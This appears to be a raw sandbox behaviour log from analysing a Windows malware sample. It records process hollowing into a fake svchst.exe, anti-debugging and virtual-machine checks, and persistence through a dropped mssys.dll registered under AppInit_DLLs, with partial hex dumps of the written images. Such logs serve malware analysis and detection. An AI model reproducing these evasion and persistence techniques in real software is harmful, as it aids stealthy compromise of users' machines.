5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier buffer overflow 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier success or wait 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System SystemBiosVersion success or wait 1 4137DC RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe C:\WINDOWS\svchst.exe none success or wait 1 4144EC CreateProcessA
Process Queried
PID Path Process info class Completion Count Source Address Symbol
1508 C:\WINDOWS\svchst.exe DebugPort success or wait 2 41226C CheckRemoteDebuggerPresent
1508 C:\WINDOWS\svchst.exe DebugObjectHandle port not set 1 412221 NtQueryInformationProcess
1508 C:\WINDOWS\svchst.exe DebugFlags success or wait 1 412238 NtQueryInformationProcess

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1700 1508 7C8106F9 414DC0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
1640 1508 7C8106F9 413ED0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
1152 1508 7C8106F9 4153C0 C:\WINDOWS\svchst.exe success or wait 1 414B7C CreateThread
Thread Context Set
TID PID DR0 DR1 DR2 DR3 DR7 EFLAGs EIP Completion Count Source Address Symbol
1136 1616 0 0 0 0 0 0 0 success or wait 1 41456C SetThreadContext
Thread Execution Resumed
TID PID Path Completion Count Source Address Symbol
1136 1616 C:\WINDOWS\svchst.exe success or wait 1 414588 ResumeThread
Thread Delayed
TID Delay Completion Count Source Address Symbol
1152 -120s success or wait 1 414198 Sleep
1152 -120s unknown 1 414198 Sleep
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
Memory Written
PID Filepath Base Length Value Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 4096 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 426000 73216 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 438000 1024 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 1 414548 WriteProcessMemory
1616 C:\WINDOWS\svchst.exe 7FFDF008 4 00 00 40 00 success or wait 1 414548 WriteProcessMemory
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 12FAB0 page read and write success or wait 1 414518 VirtualAllocEx
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:52 0 2 0
09:39:53 1 4 1
09:39:54 1 4 1
09:39:58 1 4 1
09:40:00 1 4 1
09:40:01 1 4 1
09:40:33 1 4 1
09:41:53 1 4 1

System Activites
System Information Queried
System info class Completion Count Source Address Symbol
ProcessInformation success or wait 7 4136BC CreateToolhelp32Snapshot

Timing Activites
Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 544397905
System info queried Type: ProcessInformation success or wait 544482520
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544545599
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544545810
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544548710
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544548926
System info queried Type: ProcessInformation success or wait 544549695
System info queried Type: ProcessInformation success or wait 544613958
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544683700
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544686578
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 544686793
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 544686998
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System Name: SystemBiosVersion success or wait 544688175
System info queried Type: ProcessInformation success or wait 544691725
System info queried Type: ProcessInformation success or wait 544753251
System info queried Type: ProcessInformation success or wait 544812853
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 545190128
Directory Information Queried Path: C:\WINDOWS\TempDisposition: BothDirectoryInformation Filemask: <.exe no such file 545191891
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 success or wait 545211362
Directory Information Queried Path: C:\WINDOWS\WebDisposition: BothDirectoryInformation Filemask: <.exe no such file 545215419
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 success or wait 545227904
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugPort success or wait 545235373
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugPort success or wait 545235734
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugObjectHandle port not set 545235844
Process information queried Path: C:\WINDOWS\svchst.exe PID: 1508 Info Class: DebugFlags success or wait 545235955
File created Path: C:\WINDOWS\mssys.dll Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: system Content Overwritten: true object name collision 545236607
File write Path: 1508 Offset: unknown Length: 67072 Value: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 invalid handle 545271016
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Name: AppInit_DLLs Type: unicode Data: C:\WINDOWS\mssys.dll Old data: success or wait 545274488
Thread created PID: 1508 TID: 1700 EIP: 7C8106F9 EAX: 414DC0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547138775
Thread created PID: 1508 TID: 1640 EIP: 7C8106F9 EAX: 413ED0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547359102
Thread created PID: 1508 TID: 1152 EIP: 7C8106F9 EAX: 4153C0 Imagepath: C:\WINDOWS\svchst.exe success or wait 547363423
File opened Path: z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547364746
File opened Path: z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547365659
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547367145
Thread delayed Time: -120 TID: 1152 success or wait 547368044
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547368711
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547372162
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547373100
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547375219
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547377206
